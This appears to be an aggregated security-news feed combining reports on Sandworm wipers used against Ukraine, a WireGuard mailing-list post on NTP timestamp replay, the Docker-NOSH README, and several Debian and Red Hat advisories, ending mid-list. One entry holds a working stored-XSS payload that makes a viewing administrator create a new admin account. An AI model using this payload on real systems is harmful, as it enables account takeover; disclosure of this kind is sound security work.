Categories: News
Tags: Data wipers

Tags:  Sandworm

Tags:  Ukraine

Tags:  Ukrinform

CERT-UA says the Russian Sandworm group deployed data wipers against Ukrinform, Ukraine’s national news agency.



(Read more...)




The post New data wipers deployed against Ukraine appeared first on Malwarebytes Labs.

Posted: January 30, 2023 by

As war in Ukraine rages, new destructive malware continues to be discovered.

In a recent tweet, the Ukrainian Computer Emergency Response Team (CERT-UA) named five wipers used against Ukrinform, Ukraine’s national news agency. It suspects a link to the Sandworm group.

> UPDATE: UAC-0082 (suspected #Sandworm) to target Ukrinform using 5 variants of destructive software: CaddyWiper, ZeroWipe, SDelete, AwfulShred, BidSwipe.
> 
> Details: https://t.co/vFIiRvXm0u (UA only)
> 
> — CERT-UA (@\_CERT\_UA) January 27, 2023

**Wipers**

A wiper is a type of malware that erases the contents of the affected computer's hard drive, without its user's consent.

While it may seem trivial to code a data wiper, simply deleting files is a very sloppy method that is usually easy to reverse. Computers are very bad at “forgetting”, and deleting a file usually only removes the pointer to the file, not the file itself.

There are a great variety of obstacles that have to be overcome to get a data wiper to work effectively. Among them: The attacker has to get the wiper on to the target system; they have to bypass any security that will stop an attempt to remove data without proper authorization; they may have to get around protections on disk sectors like the master boot record (MBR); and they will want to make restoration from backups as hard as possible.

Effectively this takes a dropper, to get the payload on the target system; a method to gain persistence, so the attacker can start their malicious process at will; a method to avoid detection; elevated privileges; and a method to overrule the operating system’s restrictions.

For those interested in that kind of thing, last year we posted a detailed analysis of HermeticWiper, a wiper used against Ukraine in the very early stages of Russia's invasion. The article is very technical but it gives you an idea of what it takes to create an effective data wiper. And we featured another blog that discussed IsaacWiper and CaddyWiper.

**Sandworm**

The Sandworm group, a Russian state-sponsored group of cybercriminals, has been known to target Ukrainian companies and government agencies. It is tought to be responsible for destroying entire Ukrainian networks, triggering blackouts by targeting electrical utilities with BlackEnergy malware, and releasing the infamous NotPetya malware in 2017. Not Petya is the name given to a later version of the Petya malware that began spreading rapidly, with infection sites focused in Ukraine, but from there it also spread across Europe and beyond.

**Attribution**

At the request of Ukrinform, CERT-UA started an investigation into a cyberattack which took place on January 17, 2023. It found that the initial access had been established on December 7, 2022, so the threat actor waited over a month to initiate the final stage of the attack.

Based on the results of the investigation, CERT-UA says it is confident the attack was carried out by the UAC-0082 group, which is its name for the Sandworm group.

**Analysis**

The team found 5 active wipers in the information and communication system of Ukrinform:

*   CaddyWiper (Windows)
*   ZeroWipe (Windows)
*   SDelete (legitimate Windows utility)
*   AwfulShred (Linux)
*   BidSwipe (FreeBSD)

IOCs for these wipers can be found at the bottom of the article by CERT-UA.

**RELATED ARTICLES**

New data wipers deployed against Ukraine

WireGuard, such as WireGuard 0.5.3 on Windows, does not fully account for the possibility that an adversary might be able to set a victim's system time to a future value, e.g., because unauthenticated NTP is used. This can lead to an outcome in which one static private key becomes permanently useless.

**Jason A. Donenfeld** Jason at zx2c4.com  
_Sun Aug 8 22:33:13 UTC 2021_

*   Previous message (by thread): \[PATCH 0/2\] wireguard-linux-compat: grsecurity compat patches
*   Next message (by thread): another thread on montonic counter alternatives
*   **Messages sorted by:** \[ date \] \[ thread \] \[ subject \] \[ author \]

Hi folks,

We've had this discussion a few times in various forms, but it's come
up again recently, with Karolin Varner (CC'd) emailing me with some
fresh enthusiasm about the problem space, so I thought this might be
something worth discussing again, perhaps this time with some input
from the Noise mailing list.

NoiseIK is 1-RTT, so WireGuard sticks a timestamp in the first message
to prevent replay attacks. Responders reject packets with timestamps
that are larger than the last one received. If a responder reboots,
there's subsequently no session to disrupt with a replay anyway, so
it's not an issue. Generally this works well, provided initiators have
a reliable monotonic counter. Generally timestamps are considered
reliable-enough monotonic counters. Issues with this begin from two
angles:

Angle 1) Embedded devices without a battery powered RTC that want to
use WireGuard to bootstrap have a chicken & egg problem.
Angle 2) Initiators that are using the old, crusty, and insecure NTP
protocol can have their time hijacked.

Angle 2 presents some interesting possibilities. An adversary who sets
somebody's time backwards can prevent them from connecting until their
time is set right again. Adversaries who set somebody's time forward,
say, to the maximum TAI64N value, and then subsequently have an
initiator send an initiation message, can then render that initiator's
static private key forever useless, since that future timestamp can
always be replayed, and will always set the responder's greatest-yet
value to that maximum. So, if your NTP is hijacked, your key is
forever DoS'd.

We've talked about a few solutions before to this. They all have
various pitfalls.

Idea 0) Insist people don't use NTP but rather some authenticated
alternative. Insist people have battery-powered RTCs.

Idea 1) Store a monotonic counter on disk, and just increment it by 1,
or even some random value bounded far below the limit, on each
handshake. The downside is this relies on storage that doesn't wear
out and is always available.

Idea 2) For a given system boot, store in memory the time of the first
handshake, and then increment that timestamp by 1 on each handshake.
The problem is figuring out when to sample that initial golden
timestamp. And it doesn't actually solve Angle 2, because that initial
golden timestamp still might wind up NTP sync'd at some point.

Idea 3) Insist people who must use NTP disable large jumps. This has
the same issue as Idea 2, in that the bootstrapping timestamp is still
an issue.

Idea 4) Require the responder to also have a synchronized clock and
reject handshakes that are too far into the future. This might
alleviate Angle 2 to a large degree but it causes big issues for Angle
1, potentially.

Other clever ideas?

Jason

*   Previous message (by thread): \[PATCH 0/2\] wireguard-linux-compat: grsecurity compat patches
*   Next message (by thread): another thread on montonic counter alternatives
*   **Messages sorted by:** \[ date \] \[ thread \] \[ subject \] \[ author \]

More information about the WireGuard mailing list

CVE-2021-46873: another thread on montonic counter alternatives

NOSH 4a5cfdb allows stored XSS via the create user page. For example, a first name (of a physician, assistant, or billing user) can have a JavaScript payload that is executed upon visiting the /users/2/1 page. This may allow attackers to steal Protected Health Information because the product is for health charting.

**Docker-NOSH****Installation****Step 1: Preparation**

1.  It is recommended to use an email service to take advantage of all the features of NOSH such as message and schedule notifications. Mailgun is a compatible mail service.
2.  Make sure you have a domain name registered and linked to the WAN IP (Wide Area Network Internet Protocol) address where Docker-NOSH is connected to. You can get one at Namecheap. They have great instructions for how to do this.
3.  If your Docker-NOSH is installed physically and is behind a network router, make sure port forwarding is set on your router for ports 22 (for SSH), 80 (for HTTP), and 443 (for HTTPS) routed to the LAN IP (Local Area Network Internet Protocol) address for Docker-NOSH.

**Step 2: Download and install Docker**

1.  If you use Linux, install Docker based on the distribution you use such as Ubuntu, Fedora, CentOS, and Arch/Manjaro.
2.  If you use Linux, install Docker Compose

**Step 3: Download and install Git**

Git for Windows.

Git for Mac.

Git for Linux.

**Step 4: Install Docker-NOSH****Windows:**

1.  If using Docker Toolbox for Windows, make sure Docker is active.
2.  Win + R to open the Run window; type in powershell and press Enter.
3.  In Powershell: $Env:COMPOSE_CONVERT_WINDOWS_PATHS=1
4.  Click the Windows or Start icon. In the Programs list, open the Git folder. Click the option for Git Bash.
5.  git clone https://github.com/shihjay2/docker-nosh.git
6.  cd docker-nosh
7.  ./init_win.sh

**Mac:**

1.  If using Docker Toolbox for Mac, make sure Docker is active.
2.  Open the Applications folder. Open Utilities and double-click on Terminal.
3.  git clone https://github.com/shihjay2/docker-nosh.git
4.  cd docker-nosh
5.  ./init.sh

**Linux:**

1.  Open a command-line terminal.
2.  git clone https://github.com/shihjay2/docker-nosh.git
3.  cd docker-nosh
4.  ./init.sh

**Stopping NOSH**

1.  Go to the docker-nosh directory.
2.  docker-compose down
3.  This will shut down the Docker container without removing the volumes (data) that has been saved from your NOSH instance.

**Removing NOSH**

1.  Go to the docker-nosh directory.
2.  docker-compose down -v
3.  This will shut down the Docker container in addition to removing the volumes (data). Please ensure you have a backup or that there is no valuable data to save before doing this; once it's done you can't retrieve your data!

**Security Vulnerabilities**

If you discover a security vulnerability within NOSH-in-a-Box, please send an e-mail to Michael Chen at shihjay2 at gmail.com. All security vulnerabilities will be promptly addressed.

**License**

Docker-NOSH is open-sourced software licensed under the GNU AGPLv3 license.

CVE-2023-24065: GitHub - shihjay2/docker-nosh: NOSH ChartingSystem Dockerized

Ukraine has come under a fresh cyber onslaught from Russia that involved the deployment of a previously undocumented Golang-based data wiper dubbed SwiftSlicer.
ESET attributed the attack to Sandworm, a nation-state group linked to Military Unit 74455 of the Main Intelligence Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU).
"Once executed it deletes shadow

Ukraine has come under a fresh cyber onslaught from Russia that involved the deployment of a previously undocumented Golang-based data wiper dubbed **SwiftSlicer**.

ESET attributed the attack to Sandworm, a nation-state group linked to Military Unit 74455 of the Main Intelligence Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU).

"Once executed it deletes shadow copies, recursively overwrites files located in %CSIDL\_SYSTEM%\\drivers, %CSIDL\_SYSTEM\_DRIVE%\\Windows\\NTDS and other non-system drives and then reboots computer," ESET disclosed in a series of tweets.

The overwrites are achieved by using randomly generated byte sequences to fill 4,096 byte-length blocks. The intrusion was discovered on January 25, 2023, the Slovak cybersecurity company added.

Sandworm, also tracked under the monikers BlackEnergy, Electrum, Iridium, Iron Viking, TeleBots, and Voodoo Bear, has a history of staging disruptive and destructive cyber campaigns targeting organizations worldwide since at least 2007.

The sophistication of the threat actor is evidenced by its multiple distinct kill chains, which comprise a wide variety of custom tools such as BlackEnergy, GreyEnergy, Industroyer, NotPetya, Exaramel, and Cyclops Blink.

In 2022 alone, coinciding with Russia's military invasion of Ukraine, Sandworm has unleashed WhisperGate, HermeticWiper, IsaacWiper, CaddyWiper, Industroyer2, Prestige, and RansomBoggs against critical infrastructure in Ukraine.

"When you think about it, the growth in wiper malware during a conflict is hardly a surprise," Fortinet FortiGuard Labs researcher Geri Revay said in a report published this week. "It can scarcely be monetized. The only viable use case is destruction, sabotage, and cyberwar."

The discovery of SwiftSlicer points to the consistent use of wiper malware variants by the Russian adversarial collective in attacks designed to wreak havoc in Ukraine.

The development also comes as the Computer Emergency Response Team of Ukraine (CERT-UA) linked Sandworm to a recent largely unsuccessful cyberattack on the national news agency Ukrinform.

The intrusion, which is suspected of having been carried out no later than December 7, 2022, entailed the use of five different pieces of data wiping programs, namely CaddyWiper, ZeroWipe, SDelete, AwfulShred, and BidSwipe targeting Windows, Linux, and FreeBSD systems.

"It was established that the final stage of the cyberattack was initiated on January 17, 2023," CERT-UA said in an advisory. "However, it had only partial success, in particular, in relation to several data storage systems."

Sandworm is not the only group that has its eyes on Ukraine. Other Russian state-sponsored actors such as APT29, COLDRIVER, and Gamaredonhave actively targeted a range of Ukrainian organizations since the onset of the war.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Ukraine Hit with New Golang-based 'SwiftSlicer' Wiper Malware in Latest Cyber Attack

A stored cross-site scripting (XSS) vulnerability in /index.php?page=help of Revenue Collection System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into sent messages.

    # Exploit Title: Revenue Collection System v1.0 - Authentication Bypass via Stored XSS# Exploit Author: Joe Pollock# Date: November 16, 2022# Vendor Homepage: https://www.sourcecodester.com/php/14904/rates-system.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/rates.zip# Tested on: Kali Linux, Apache, Mysql# CVE: T.B.C# Vendor: Kapiya# Version: 1.0# Exploit Description:#   Revenue Collection System v1.0 suffers from a Stored Cross-Site Scripting vulnerability allowing an authenticated #   client user to add an administrative user account to the application then log in as the newly created admin.To reproduce this exploit, log in as a client user then navigate to the 'Help' functionality (/index.php?page=help).The help functionality is used to contact an administrator by sending a message. Paste the Javascript code below into the'Your Message' textbox then click 'Send'. When an administrator views this message, an administrative user account will be added to the application with username "admin_new" and password "Test123Test123". Using these credentials, it should now be possible to log in to the application via the administrative login, here: /admin/login.php (Note: change the'target', 'x_Username', and 'x_Passsword' as required).<script>var target = "http://localhost/rates/admin/usersadd.php";var req = new XMLHttpRequest();req.open("GET", target);req.send();var parser = new DOMParser();resp = req.responseTextvar document = parser.parseFromString(resp, "text/html");var token = document.getElementsByName("token")[0].value;var params = "token="+token+"&t=users&action=insert&&modal=0&x_Fullname=test&x_Username=admin_new&x__Email=test123%40test123.com&x_Passsword=Test123Test123&x_userLevelId=-1";req.open("POST", target);req.withCredentials = true;req.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");req.send(params);</script>

CVE-2022-46968: Revenue Collection System 1.0 Cross Site Scripting

An incorrect TLB flush issue was found in the Linux kernel’s GPU i915 kernel driver, potentially leading to random memory corruption or data leaks. This flaw could allow a local user to crash the system or escalate their privileges on the system.

'2147572?cve=title' is not a valid bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2022-4139: Invalid Bug ID

Debian Linux Security Advisory 5328-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5328-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJanuary 26, 2023                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2023-0471 CVE-2023-0472 CVE-2023-0473 CVE-2023-0474Debian Bug     : 1011346Multiple security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the stable distribution (bullseye), these problems have been fixed inversion 109.0.5414.119-1~deb11u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmPSxfAACgkQEMKTtsN8TjZlkQ/+PGr18MyY4Su8U78MrneB965DP5Q/faHnU/AIERZ99dkb9XkuKR7icqaUh3AdyK7fN1wz/cG/sAFa2MoFsL/tcGS0SmpZsNRdbQy6mbpYO/5yQrqW2+msvpmT/uNMCpMn9+8K2L0+yuuDCkL9KhuHZRg3UrN8T3xfkU2rebxRslvQixy9a5M8cQ+wAP4TrsKiyIRaBBrJNPE4BjKGOFYQmZn9Ov8iRMaApXgSzO7RV9ocMKbtWz5n7m6cTfpq4vOuLkugnYa/J3Xn5PozT1O8qTcru3i6CFOow/v/YEHjw2DYd42NmA+Ojon0nBPPwShPbZndJrNvloeYyrcHHf7Em330b71gtip3ri9QfenPAaJgfdJ4mIpdyDJ/rZiH4oNbkilZrlgLM4Sw/JUh2jQ8tDK2udVWyH10uYS3teGDSq/EIU3ZInKGzlez7j7ZzQuAgwTwHwwlezD4Ppr02Zuu5lvVvOSfkjE5IQnyUNb/VWGd28oN6PKq4OgMYAOPVJFPy6dvs+YR2zCJKkZBCtfeJM8lO8Ncq/gs80SKtWDibmD/lRVbVotoGoNCebFVPeoeNXgWjGb3WC6PLDBoLc/GCxqFPoNxU8y1gKi5SdcMEqLTUIjH1f8BX28c9ZZmWgpZdctavsRH5mdRgsz6kb78bWbMQYqj1sVPPufZjOF5AfQ==PFa0-----END PGP SIGNATURE-----

Debian Security Advisory 5328-1

Red Hat Security Advisory 2023-0476-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 102.7.1. Issues addressed include a bypass vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2023:0476-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0476  
Issue date:        2023-01-26  
CVE Names:         CVE-2022-46871 CVE-2022-46877 CVE-2023-23598   
                   CVE-2023-23599 CVE-2023-23601 CVE-2023-23602   
                   CVE-2023-23603 CVE-2023-23605   
=====================================================================

1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 102.7.1.

Security Fix(es):

* Mozilla: libusrsctp library out of date (CVE-2022-46871)

* Mozilla: Arbitrary file read from GTK drag and drop on Linux  
(CVE-2023-23598)

* Mozilla: Memory safety bugs fixed in Firefox 109 and Firefox ESR 102.7  
(CVE-2023-23605)

* Mozilla: Malicious command could be hidden in devtools output  
(CVE-2023-23599)

* Mozilla: URL being dragged from cross-origin iframe into same tab  
triggers navigation (CVE-2023-23601)

* Mozilla: Content Security Policy wasn't being correctly applied to  
WebSockets in WebWorkers (CVE-2023-23602)

* Mozilla: Fullscreen notification bypass (CVE-2022-46877)

* Mozilla: Calls to <code>console.log</code> allowed bypasing Content  
Security Policy via format directive (CVE-2023-23603)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2162336 - CVE-2022-46871 Mozilla: libusrsctp library out of date  
2162338 - CVE-2023-23598 Mozilla: Arbitrary file read from GTK drag and drop on Linux  
2162339 - CVE-2023-23599 Mozilla: Malicious command could be hidden in devtools output  
2162340 - CVE-2023-23601 Mozilla: URL being dragged from cross-origin iframe into same tab triggers navigation  
2162341 - CVE-2023-23602 Mozilla: Content Security Policy wasn't being correctly applied to WebSockets in WebWorkers  
2162342 - CVE-2022-46877 Mozilla: Fullscreen notification bypass  
2162343 - CVE-2023-23603 Mozilla: Calls to <code>console.log</code> allowed bypasing Content Security Policy via format directive  
2162344 - CVE-2023-23605 Mozilla: Memory safety bugs fixed in Firefox 109 and Firefox ESR 102.7

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
thunderbird-102.7.1-1.el9_1.src.rpm

aarch64:  
thunderbird-102.7.1-1.el9_1.aarch64.rpm  
thunderbird-debuginfo-102.7.1-1.el9_1.aarch64.rpm  
thunderbird-debugsource-102.7.1-1.el9_1.aarch64.rpm

ppc64le:  
thunderbird-102.7.1-1.el9_1.ppc64le.rpm  
thunderbird-debuginfo-102.7.1-1.el9_1.ppc64le.rpm  
thunderbird-debugsource-102.7.1-1.el9_1.ppc64le.rpm

s390x:  
thunderbird-102.7.1-1.el9_1.s390x.rpm  
thunderbird-debuginfo-102.7.1-1.el9_1.s390x.rpm  
thunderbird-debugsource-102.7.1-1.el9_1.s390x.rpm

x86_64:  
thunderbird-102.7.1-1.el9_1.x86_64.rpm  
thunderbird-debuginfo-102.7.1-1.el9_1.x86_64.rpm  
thunderbird-debugsource-102.7.1-1.el9_1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-46871  
https://access.redhat.com/security/cve/CVE-2022-46877  
https://access.redhat.com/security/cve/CVE-2023-23598  
https://access.redhat.com/security/cve/CVE-2023-23599  
https://access.redhat.com/security/cve/CVE-2023-23601  
https://access.redhat.com/security/cve/CVE-2023-23602  
https://access.redhat.com/security/cve/CVE-2023-23603  
https://access.redhat.com/security/cve/CVE-2023-23605  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY9L//dzjgjWX9erEAQh2Ag//Z+GUFhiFqY66raAqH14e824fGrVsTUgT  
JAwhqw8/ku5/JGsOC9WRdXpSPXPH9TrR1c0d2wZqB574eGxYJf2tNJFZCaq5YaGo  
KkBnR35OQA2aXmAB8jaRrsaYkL/MjJyQbbg6EnI/ho8d+f2CDLQvyCOkf95FTdop  
jWPGv/99d7x0nIfJzqlCSJzTH8W5yx+dhpRu1R5Y3D6RrrQ2wL+0C6aa4CRjq75M  
acvpva3zgXdqy7vztBQoXO4j2Ov8WOGkSd5mLhVKbTxjikcBn0krKMOOodz4Zwil  
LdCZ99dFs97g65Feb+8R+KT5WhFlG+rBQjtmYGTIweNDphzEgAiKMOVN8IARLxEs  
QxoceVv13CIU6aW5jVSb4wDxt3hdRA6OGwHod+veoTc25A/dqGMf/CXkPsXNG0so  
z+eV4QfxVqywifLqEyFBaq0ySM1aRY6EAbzVfBW+UzwW7SoqyKxzFoMgsoxlrtiQ  
ID5y2c14Rd/TEPZaQhRtzAAUL85cFYhT7Kjg71pnk9s0YdLOpZzkhjc9k5leQe+v  
v/woJfMmV/f/lt2dm0NW1broHmzSEnJ/SWzEjBzBggu0cHodyn4pWZnVixO4cIRT  
4YeDncrfkN7GihXPa7UjIJuCclYBgZHRLCGDqjgD0Gbh4gobTheD0py0byYUsqGO  
pswTQTOkxDY=  
=PlBp  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0476-01

Debian Linux Security Advisory 5329-1 - Several vulnerabilities were discovered in BIND, a DNS server implementation, which may result in denial of service against named.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5329-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJanuary 26, 2023                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : bind9CVE ID         : CVE-2022-3094 CVE-2022-3736 CVE-2022-3924Several vulnerabilities were discovered in BIND, a DNS serverimplementation, which may result in denial of service against named.For the stable distribution (bullseye), these problems have been fixed inversion 1:9.16.37-1~deb11u1.We recommend that you upgrade your bind9 packages.For the detailed security status of bind9 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/bind9Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmPSxg4ACgkQEMKTtsN8TjaEyw//bjGBSD6QFX5xfkXzm4fHKEBnl3/yg0z+p6ml3xGQQJaBzwljn4J2McGxxtCsgOVTyyvy/uocUsK4X1LZk8kGfbbiGN+63o2PoADX76bPhbv69CiRxd1NRnprSMLsJyBHaiB8TFPFBnPz//Q7KY9KvhzUbv/g4ocIYmlrxUZiZmmyJB8kJ3lzFJIBzThlcmnCLHjs4IDF516BJMywxYnsnSRc0G73jB1zlcmBB0loYpD3U434C+pUCMKkrpYPeBFZHGikpYs7x+lJ95WmggYtoNjz0iPwpK1hd2vvM1rxr93jARKMTlKh5OMtljIK67NQeKfyojd4Uva49SAVYuo38MCLO2H4NEPPoEh+OGUJBgCagvwgye+GPOM+c++Ii9LNqNdwEThG2WVVP4f/Hore27l4lswGICLk9662lSJsAnZtdTQUSvFbeI8k8ne/2bvYrkZbCWDv8gPhLlCa6c80zag+ZzhOAvghBfj7AbRch/7feqe+RYAJ4qPuHmEokpxGL9gboa/4y3YJeCSKv13xXbz13FJyPMpsfiLVCp6ajhE1iVL3Trkr4rUGGmQVXClsBrDibeIu5YQvqnBtTZckrt8WoKo7GedrZxu/vrAqtwQVsL+7UrNUQbZLcTTLwZRc/RRegsHBqptYu/+joV+8ndQ9G2wX/35ss8hd+uQ2wvE==/JXy-----END PGP SIGNATURE-----

Debian Security Advisory 5329-1

Red Hat Security Advisory 2023-0208-01 - The java-1.8.0-openjdk packages provide the OpenJDK 8 Java Runtime Environment and the OpenJDK 8 Java Software Development Kit. Issues addressed include a deserialization vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: java-1.8.0-openjdk security and bug fix update  
Advisory ID:       RHSA-2023:0208-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0208  
Issue date:        2023-01-26  
CVE Names:         CVE-2023-21830 CVE-2023-21843   
=====================================================================

1. Summary:

An update for java-1.8.0-openjdk is now available for Red Hat Enterprise  
Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder (v. 8) - aarch64, ppc64le, x86_64  
Red Hat Enterprise Linux AppStream (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The java-1.8.0-openjdk packages provide the OpenJDK 8 Java Runtime  
Environment and the OpenJDK 8 Java Software Development Kit.

Security Fix(es):

* OpenJDK: improper restrictions in CORBA deserialization (Serialization,  
8285021) (CVE-2023-21830)

* OpenJDK: soundbank URL remote loading (Sound, 8293742) (CVE-2023-21843)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* Leak File Descriptors Because of  
ResolverLocalFilesystem#engineResolveURI() (BZ#2139705)

* Prepare for the next quarterly OpenJDK upstream release (2023-01, 8u362)  
[rhel-8] (BZ#2159910)

* solr broken due to access denied ("java.io.FilePermission"  
"/etc/pki/java/cacerts" "read") [rhel-8, openjdk-8] (BZ#2163595)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of OpenJDK Java must be restarted for this update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2139705 - Leak File Descriptors Because of ResolverLocalFilesystem#engineResolveURI() [rhel-8.7.0.z]  
2159910 - Prepare for the next quarterly OpenJDK upstream release (2023-01, 8u362) [rhel-8] [rhel-8.7.0.z]  
2160475 - CVE-2023-21843 OpenJDK: soundbank URL remote loading (Sound, 8293742)  
2160490 - CVE-2023-21830 OpenJDK: improper restrictions in CORBA deserialization (Serialization, 8285021)  
2163595 - solr broken due to access denied ("java.io.FilePermission" "/etc/pki/java/cacerts" "read") [rhel-8, openjdk-8] [rhel-8.7.0.z]

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
java-1.8.0-openjdk-1.8.0.362.b09-2.el8_7.src.rpm

aarch64:  
java-1.8.0-openjdk-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-accessibility-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-demo-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-devel-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-headless-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-src-1.8.0.362.b09-2.el8_7.aarch64.rpm

noarch:  
java-1.8.0-openjdk-javadoc-1.8.0.362.b09-2.el8_7.noarch.rpm  
java-1.8.0-openjdk-javadoc-zip-1.8.0.362.b09-2.el8_7.noarch.rpm

ppc64le:  
java-1.8.0-openjdk-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-accessibility-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-demo-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-devel-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-headless-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-src-1.8.0.362.b09-2.el8_7.ppc64le.rpm

s390x:  
java-1.8.0-openjdk-1.8.0.362.b09-2.el8_7.s390x.rpm  
java-1.8.0-openjdk-accessibility-1.8.0.362.b09-2.el8_7.s390x.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b09-2.el8_7.s390x.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.362.b09-2.el8_7.s390x.rpm  
java-1.8.0-openjdk-demo-1.8.0.362.b09-2.el8_7.s390x.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.362.b09-2.el8_7.s390x.rpm  
java-1.8.0-openjdk-devel-1.8.0.362.b09-2.el8_7.s390x.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.362.b09-2.el8_7.s390x.rpm  
java-1.8.0-openjdk-headless-1.8.0.362.b09-2.el8_7.s390x.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.362.b09-2.el8_7.s390x.rpm  
java-1.8.0-openjdk-src-1.8.0.362.b09-2.el8_7.s390x.rpm

x86_64:  
java-1.8.0-openjdk-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-accessibility-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b09-2.el8_7.x86_64.rpm  
